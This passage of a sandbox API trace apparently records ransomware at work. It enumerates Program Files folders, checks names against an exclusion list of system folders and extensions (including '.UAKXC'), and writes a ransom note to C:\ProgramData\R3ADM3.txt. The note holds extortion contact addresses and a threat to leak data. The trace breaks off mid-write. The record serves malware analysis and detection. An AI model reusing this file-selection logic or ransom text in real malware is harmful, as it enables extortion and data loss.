hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4038 | out: hHeap=0xea0000) returned 1 [0136.934] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6d30 [0136.934] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xedaa50 [0136.935] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8ec8 | out: hHeap=0xea0000) returned 1 [0136.935] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdc52b540, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc52b540, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Defender", cAlternateFileName="WINDOW~3")) returned 1 [0136.935] lstrcmpW (lpString1="Windows Defender", lpString2=".") returned 1 [0136.935] lstrcmpW (lpString1="Windows Defender", lpString2="..") returned 1 [0136.935] StrStrIW (lpFirst="Windows Defender", lpSrch="tmp") returned 0x0 [0136.935] StrStrIW (lpFirst="Windows Defender", lpSrch="winnt") returned 0x0 [0136.935] StrStrIW (lpFirst="Windows Defender", lpSrch="temp") returned 0x0 [0136.935] StrStrIW (lpFirst="Windows Defender", lpSrch="thumb") returned 0x0 [0136.935] StrStrIW (lpFirst="Windows Defender", lpSrch="$Recycle.Bin") returned 0x0 [0136.935] StrStrIW (lpFirst="Windows Defender", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.935] StrStrIW (lpFirst="Windows Defender", lpSrch="System Volume Information") returned 0x0 [0136.935] StrStrIW (lpFirst="Windows Defender", lpSrch="Boot") returned 0x0 [0136.935] StrStrIW (lpFirst="Windows Defender", lpSrch="Windows") returned="Windows Defender" [0136.935] StrStrIW (lpFirst="Windows Defender", lpSrch=".UAKXC") returned 0x0 [0136.935] StrStrIW (lpFirst="Windows Defender", lpSrch=".exe") returned 0x0 [0136.935] StrStrIW (lpFirst="Windows Defender", lpSrch=".dll") returned 0x0 [0136.935] StrStrIW (lpFirst="Windows Defender", lpSrch=".lnk") returned 0x0 [0136.935] StrStrIW (lpFirst="Windows Defender", lpSrch=".sys") returned 0x0 [0136.935] StrStrIW (lpFirst="Windows Defender", lpSrch=".msi") returned 0x0 [0136.935] StrStrIW (lpFirst="Windows Defender", lpSrch="R3ADM3.txt") returned 0x0 [0136.935] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0136.935] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.935] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0136.935] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2c60 [0136.935] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4070 | out: hHeap=0xea0000) returned 1 [0136.935] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.936] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4038 | out: hHeap=0xea0000) returned 1 [0136.936] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2aa8 [0136.936] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6d58 [0136.936] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2a50 [0136.936] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2aa8 | out: hHeap=0xea0000) returned 1 [0136.936] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2c60 | out: hHeap=0xea0000) returned 1 [0136.936] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd91d5ea, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ea6723d, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Mail", cAlternateFileName="WINDOW~1")) returned 1 [0136.936] lstrcmpW (lpString1="Windows Mail", lpString2=".") returned 1 [0136.936] lstrcmpW (lpString1="Windows Mail", lpString2="..") returned 1 [0136.936] StrStrIW (lpFirst="Windows Mail", lpSrch="tmp") returned 0x0 [0136.936] StrStrIW (lpFirst="Windows Mail", lpSrch="winnt") returned 0x0 [0136.936] StrStrIW (lpFirst="Windows Mail", lpSrch="temp") returned 0x0 [0136.936] StrStrIW (lpFirst="Windows Mail", lpSrch="thumb") returned 0x0 [0136.936] StrStrIW (lpFirst="Windows Mail", lpSrch="$Recycle.Bin") returned 0x0 [0136.936] StrStrIW (lpFirst="Windows Mail", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.936] StrStrIW (lpFirst="Windows Mail", lpSrch="System Volume Information") returned 0x0 [0136.936] StrStrIW (lpFirst="Windows Mail", lpSrch="Boot") returned 0x0 [0136.936] StrStrIW (lpFirst="Windows Mail", lpSrch="Windows") returned="Windows Mail" [0136.936] StrStrIW (lpFirst="Windows Mail", lpSrch=".UAKXC") returned 0x0 [0136.936] StrStrIW (lpFirst="Windows Mail", lpSrch=".exe") returned 0x0 [0136.936] StrStrIW (lpFirst="Windows Mail", lpSrch=".dll") returned 0x0 [0136.936] StrStrIW (lpFirst="Windows Mail", lpSrch=".lnk") returned 0x0 [0136.936] StrStrIW (lpFirst="Windows Mail", lpSrch=".sys") returned 0x0 [0136.936] StrStrIW (lpFirst="Windows Mail", lpSrch=".msi") returned 0x0 [0136.936] StrStrIW (lpFirst="Windows Mail", lpSrch="R3ADM3.txt") returned 0x0 [0136.937] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6d80 [0136.937] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0136.937] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.937] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2c60 [0136.937] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.937] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4038 | out: hHeap=0xea0000) returned 1 [0136.937] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6d80 | out: hHeap=0xea0000) returned 1 [0136.937] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2aa8 [0136.937] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6d80 [0136.937] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2bb0 [0136.937] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2aa8 | out: hHeap=0xea0000) returned 1 [0136.937] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2c60 | out: hHeap=0xea0000) returned 1 [0136.937] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdc5c3ac0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc5c3ac0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Media Player", cAlternateFileName="WI54FB~1")) returned 1 [0136.937] lstrcmpW (lpString1="Windows Media Player", lpString2=".") returned 1 [0136.937] lstrcmpW (lpString1="Windows Media Player", lpString2="..") returned 1 [0136.937] StrStrIW (lpFirst="Windows Media Player", lpSrch="tmp") returned 0x0 [0136.937] StrStrIW (lpFirst="Windows Media Player", lpSrch="winnt") returned 0x0 [0136.937] StrStrIW (lpFirst="Windows Media Player", lpSrch="temp") returned 0x0 [0136.937] StrStrIW (lpFirst="Windows Media Player", lpSrch="thumb") returned 0x0 [0136.938] StrStrIW (lpFirst="Windows Media Player", lpSrch="$Recycle.Bin") returned 0x0 [0136.938] StrStrIW (lpFirst="Windows Media Player", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.938] StrStrIW (lpFirst="Windows Media Player", lpSrch="System Volume Information") returned 0x0 [0136.938] StrStrIW (lpFirst="Windows Media Player", lpSrch="Boot") returned 0x0 [0136.938] StrStrIW (lpFirst="Windows Media Player", lpSrch="Windows") returned="Windows Media Player" [0136.938] StrStrIW (lpFirst="Windows Media Player", lpSrch=".UAKXC") returned 0x0 [0136.938] StrStrIW (lpFirst="Windows Media Player", lpSrch=".exe") returned 0x0 [0136.938] StrStrIW (lpFirst="Windows Media Player", lpSrch=".dll") returned 0x0 [0136.938] StrStrIW (lpFirst="Windows Media Player", lpSrch=".lnk") returned 0x0 [0136.938] StrStrIW (lpFirst="Windows Media Player", lpSrch=".sys") returned 0x0 [0136.938] StrStrIW (lpFirst="Windows Media Player", lpSrch=".msi") returned 0x0 [0136.938] StrStrIW (lpFirst="Windows Media Player", lpSrch="R3ADM3.txt") returned 0x0 [0136.938] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0136.938] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.938] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0136.938] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xed8ec8 [0136.938] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4070 | out: hHeap=0xea0000) returned 1 [0136.938] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.938] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4038 | out: hHeap=0xea0000) returned 1 [0136.938] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xedaab8 [0136.938] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6da8 [0136.938] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xedab20 [0136.938] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedaab8 | out: hHeap=0xea0000) returned 1 [0136.939] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8ec8 | out: hHeap=0xea0000) returned 1 [0136.939] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdc4df280, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc4df280, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows NT", cAlternateFileName="WINDOW~2")) returned 1 [0136.939] lstrcmpW (lpString1="Windows NT", lpString2=".") returned 1 [0136.939] lstrcmpW (lpString1="Windows NT", lpString2="..") returned 1 [0136.939] StrStrIW (lpFirst="Windows NT", lpSrch="tmp") returned 0x0 [0136.939] StrStrIW (lpFirst="Windows NT", lpSrch="winnt") returned 0x0 [0136.939] StrStrIW (lpFirst="Windows NT", lpSrch="temp") returned 0x0 [0136.939] StrStrIW (lpFirst="Windows NT", lpSrch="thumb") returned 0x0 [0136.939] StrStrIW (lpFirst="Windows NT", lpSrch="$Recycle.Bin") returned 0x0 [0136.939] StrStrIW (lpFirst="Windows NT", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.939] StrStrIW (lpFirst="Windows NT", lpSrch="System Volume Information") returned 0x0 [0136.939] StrStrIW (lpFirst="Windows NT", lpSrch="Boot") returned 0x0 [0136.939] StrStrIW (lpFirst="Windows NT", lpSrch="Windows") returned="Windows NT" [0136.939] StrStrIW (lpFirst="Windows NT", lpSrch=".UAKXC") returned 0x0 [0136.939] StrStrIW (lpFirst="Windows NT", lpSrch=".exe") returned 0x0 [0136.939] StrStrIW (lpFirst="Windows NT", lpSrch=".dll") returned 0x0 [0136.939] StrStrIW (lpFirst="Windows NT", lpSrch=".lnk") returned 0x0 [0136.939] StrStrIW (lpFirst="Windows NT", lpSrch=".sys") returned 0x0 [0136.939] StrStrIW (lpFirst="Windows NT", lpSrch=".msi") returned 0x0 [0136.939] StrStrIW (lpFirst="Windows NT", lpSrch="R3ADM3.txt") returned 0x0 [0136.939] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6dd0 [0136.939] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0136.939] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.939] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2c60 [0136.940] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.940] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4038 | out: hHeap=0xea0000) returned 1 [0136.940] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6dd0 | out: hHeap=0xea0000) returned 1 [0136.940] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2aa8 [0136.940] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6dd0 [0136.940] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2fd0 [0136.940] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2aa8 | out: hHeap=0xea0000) returned 1 [0136.940] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2c60 | out: hHeap=0xea0000) returned 1 [0136.940] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdc5516a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc5516a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Photo Viewer", cAlternateFileName="WINDOW~4")) returned 1 [0136.940] lstrcmpW (lpString1="Windows Photo Viewer", lpString2=".") returned 1 [0136.940] lstrcmpW (lpString1="Windows Photo Viewer", lpString2="..") returned 1 [0136.940] StrStrIW (lpFirst="Windows Photo Viewer", lpSrch="tmp") returned 0x0 [0136.940] StrStrIW (lpFirst="Windows Photo Viewer", lpSrch="winnt") returned 0x0 [0136.940] StrStrIW (lpFirst="Windows Photo Viewer", lpSrch="temp") returned 0x0 [0136.940] StrStrIW (lpFirst="Windows Photo Viewer", lpSrch="thumb") returned 0x0 [0136.940] StrStrIW (lpFirst="Windows Photo Viewer", lpSrch="$Recycle.Bin") returned 0x0 [0136.940] StrStrIW (lpFirst="Windows Photo Viewer", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.940] StrStrIW (lpFirst="Windows Photo Viewer", lpSrch="System Volume Information") returned 0x0 [0136.940] StrStrIW (lpFirst="Windows Photo Viewer", lpSrch="Boot") returned 0x0 [0136.940] StrStrIW (lpFirst="Windows Photo Viewer", lpSrch="Windows") returned="Windows Photo Viewer" [0136.940] StrStrIW (lpFirst="Windows Photo Viewer", lpSrch=".UAKXC") returned 0x0 [0136.940] StrStrIW (lpFirst="Windows Photo Viewer", lpSrch=".exe") returned 0x0 [0136.940] StrStrIW (lpFirst="Windows Photo Viewer", lpSrch=".dll") returned 0x0 [0136.941] StrStrIW (lpFirst="Windows Photo Viewer", lpSrch=".lnk") returned 0x0 [0136.941] StrStrIW (lpFirst="Windows Photo Viewer", lpSrch=".sys") returned 0x0 [0136.941] StrStrIW (lpFirst="Windows Photo Viewer", lpSrch=".msi") returned 0x0 [0136.941] StrStrIW (lpFirst="Windows Photo Viewer", lpSrch="R3ADM3.txt") returned 0x0 [0136.941] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0136.941] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.941] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0136.941] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xed8ec8 [0136.941] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4070 | out: hHeap=0xea0000) returned 1 [0136.941] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.941] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4038 | out: hHeap=0xea0000) returned 1 [0136.941] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xedaab8 [0136.941] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6df8 [0136.941] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xedab88 [0136.941] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedaab8 | out: hHeap=0xea0000) returned 1 [0136.941] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8ec8 | out: hHeap=0xea0000) returned 1 [0136.941] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdc420ba0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc420ba0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Portable Devices", cAlternateFileName="WIBFE5~1")) returned 1 [0136.941] lstrcmpW (lpString1="Windows Portable Devices", lpString2=".") returned 1 [0136.941] lstrcmpW (lpString1="Windows Portable Devices", lpString2="..") returned 1 [0136.941] StrStrIW (lpFirst="Windows Portable Devices", lpSrch="tmp") returned 0x0 [0136.941] StrStrIW (lpFirst="Windows Portable Devices", lpSrch="winnt") returned 0x0 [0136.941] StrStrIW (lpFirst="Windows Portable Devices", lpSrch="temp") returned 0x0 [0136.942] StrStrIW (lpFirst="Windows Portable Devices", lpSrch="thumb") returned 0x0 [0136.942] StrStrIW (lpFirst="Windows Portable Devices", lpSrch="$Recycle.Bin") returned 0x0 [0136.942] StrStrIW (lpFirst="Windows Portable Devices", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.942] StrStrIW (lpFirst="Windows Portable Devices", lpSrch="System Volume Information") returned 0x0 [0136.942] StrStrIW (lpFirst="Windows Portable Devices", lpSrch="Boot") returned 0x0 [0136.942] StrStrIW (lpFirst="Windows Portable Devices", lpSrch="Windows") returned="Windows Portable Devices" [0136.942] StrStrIW (lpFirst="Windows Portable Devices", lpSrch=".UAKXC") returned 0x0 [0136.942] StrStrIW (lpFirst="Windows Portable Devices", lpSrch=".exe") returned 0x0 [0136.942] StrStrIW (lpFirst="Windows Portable Devices", lpSrch=".dll") returned 0x0 [0136.942] StrStrIW (lpFirst="Windows Portable Devices", lpSrch=".lnk") returned 0x0 [0136.942] StrStrIW (lpFirst="Windows Portable Devices", lpSrch=".sys") returned 0x0 [0136.942] StrStrIW (lpFirst="Windows Portable Devices", lpSrch=".msi") returned 0x0 [0136.942] StrStrIW (lpFirst="Windows Portable Devices", lpSrch="R3ADM3.txt") returned 0x0 [0136.942] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcd68 [0136.942] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0136.942] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.942] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xed8ec8 [0136.942] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.942] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4038 | out: hHeap=0xea0000) returned 1 [0136.942] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcd68 | out: hHeap=0xea0000) returned 1 [0136.942] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xedaab8 [0136.942] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6e20 [0136.942] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xed76f8 [0136.943] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedaab8 | out: hHeap=0xea0000) returned 1 [0136.943] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8ec8 | out: hHeap=0xea0000) returned 1 [0136.943] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdbdbb080, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbdbb080, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 1 [0136.943] lstrcmpW (lpString1="Windows Sidebar", lpString2=".") returned 1 [0136.943] lstrcmpW (lpString1="Windows Sidebar", lpString2="..") returned 1 [0136.943] StrStrIW (lpFirst="Windows Sidebar", lpSrch="tmp") returned 0x0 [0136.943] StrStrIW (lpFirst="Windows Sidebar", lpSrch="winnt") returned 0x0 [0136.943] StrStrIW (lpFirst="Windows Sidebar", lpSrch="temp") returned 0x0 [0136.943] StrStrIW (lpFirst="Windows Sidebar", lpSrch="thumb") returned 0x0 [0136.943] StrStrIW (lpFirst="Windows Sidebar", lpSrch="$Recycle.Bin") returned 0x0 [0136.943] StrStrIW (lpFirst="Windows Sidebar", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.943] StrStrIW (lpFirst="Windows Sidebar", lpSrch="System Volume Information") returned 0x0 [0136.943] StrStrIW (lpFirst="Windows Sidebar", lpSrch="Boot") returned 0x0 [0136.943] StrStrIW (lpFirst="Windows Sidebar", lpSrch="Windows") returned="Windows Sidebar" [0136.943] StrStrIW (lpFirst="Windows Sidebar", lpSrch=".UAKXC") returned 0x0 [0136.943] StrStrIW (lpFirst="Windows Sidebar", lpSrch=".exe") returned 0x0 [0136.943] StrStrIW (lpFirst="Windows Sidebar", lpSrch=".dll") returned 0x0 [0136.943] StrStrIW (lpFirst="Windows Sidebar", lpSrch=".lnk") returned 0x0 [0136.943] StrStrIW (lpFirst="Windows Sidebar", lpSrch=".sys") returned 0x0 [0136.943] StrStrIW (lpFirst="Windows Sidebar", lpSrch=".msi") returned 0x0 [0136.943] StrStrIW (lpFirst="Windows Sidebar", lpSrch="R3ADM3.txt") returned 0x0 [0136.943] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6e48 [0136.943] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0136.943] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.944] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2c60 [0136.944] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.944] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4038 | out: hHeap=0xea0000) returned 1 [0136.944] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6e48 | out: hHeap=0xea0000) returned 1 [0136.944] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2aa8 [0136.944] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6e48 [0136.944] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2f78 [0136.944] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2aa8 | out: hHeap=0xea0000) returned 1 [0136.944] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2c60 | out: hHeap=0xea0000) returned 1 [0136.944] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdbdbb080, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbdbb080, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 0 [0136.944] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f20 | out: hHeap=0xea0000) returned 1 [0136.944] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2d38 | out: hHeap=0xea0000) returned 1 [0136.944] FindClose (in: hFindFile=0xecfc60 | out: hFindFile=0xecfc60) returned 1 [0136.944] Sleep (dwMilliseconds=0x32) [0137.011] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc00 | out: hHeap=0xea0000) returned 1 [0137.011] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f58 | out: hHeap=0xea0000) returned 1 [0137.011] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6e48 [0137.011] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6e20 [0137.011] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f58 [0137.012] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6e20 | out: hHeap=0xea0000) returned 1 [0137.012] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6e20 [0137.012] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6df8 [0137.012] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6dd0 [0137.012] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6da8 [0137.012] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc00 [0137.012] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6da8 | out: hHeap=0xea0000) returned 1 [0137.012] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6dd0 | out: hHeap=0xea0000) returned 1 [0137.012] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6df8 | out: hHeap=0xea0000) returned 1 [0137.012] CreateFileW (lpFileName="C:\\ProgramData\\R3ADM3.txt" (normalized: "c:\\programdata\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0137.013] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0137.013] WriteFile (in: hFile=0x2b0, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: 